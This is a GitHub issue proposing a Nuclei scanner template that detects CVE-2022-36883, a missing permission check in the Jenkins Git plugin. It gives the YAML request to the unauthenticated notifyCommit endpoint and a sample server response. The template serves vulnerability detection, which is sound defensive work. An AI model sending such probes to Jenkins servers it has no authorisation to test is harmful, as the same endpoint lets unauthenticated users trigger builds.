### ISSUE TITLE
Jenkins Git plugin - CVE-2022-36883

### ISSUE THREAD

**Issue by c-sh0** [projectdiscovery/nuclei-templates#4996]
### Template Information:
CVE-2022-36883 - Jenkins Git plugin 

Trivial to test for, Check response code/body
- 200 OK (Access Allowed, {{randstr}} in response body)
- 401 Unauthorized

### Nuclei Template:
```yaml
id: CVE-2022-36883
info:
  name: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit.
  severity: high
  author: c-sh0
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36883
    - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-36883
    cwe-id: CWE-862
  tags: cve,cve2022,jenkins,plugin,git,unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '{{randstr}}'
```

### Sample Output Snippet
`HTTP/1.1 200 OK`
`No git jobs using repository: 2CrRXirHvGA3xRntW9KXCVBvJgl and branches: 2CrRXirHvGA3xRntW9KXCVBvJgl`
`No Git consumers using SCM API plugin for: 2CrRXirHvGA3xRntW9KXCVBvJgl`
